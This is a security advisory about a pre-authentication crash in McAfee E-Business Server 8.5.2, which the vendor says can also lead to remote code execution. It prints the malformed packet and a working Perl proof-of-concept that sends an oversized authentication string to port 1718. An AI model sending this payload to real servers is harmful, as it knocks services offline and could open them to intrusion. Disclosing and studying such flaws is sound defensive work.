|
|
| |
| McAfee E-Business Server "guards sensitive corporate data with industry-standard PGP 128-bit encryption and authentication. McAfee E-Business Server supports a variety of platforms and security certificates". It possible to crash McAffe's E-Business Server by sending it a malicious packet to its TCP port 1718. |
| |
Credit:
The information has been provided by Leon Juranic.
The original article can be found at: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06
|
| |
Vulnerable Systems:
* McAfee E-Business Server version 8.5.2
It is possible to crash McAfee E-Business Server during the authentication process. When a malformed (oversized) initial authentication packet is sent to E-Business Server, the server will crash, and will have to be manually restarted.
A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953
McAfee further researched the vulnerability and confirmed that it allows an attacker to also remotely execute code.
Solution:
The vendor has addressed this vulnerability with E-Business server patch update on January 8th, 2008.
Vendor advisory and update link:
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472& sliceId=SAL_Public&command=show& forward=nonthreadedKC&kcId=614472
Exploit:
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) - http://www.infigo.hr/files/mcafee2.pl
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>,
# Infigo IS <http://www.infigo.hr/en/>
#
use IO::Socket;
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
|
|
|
|
|
|
|
|
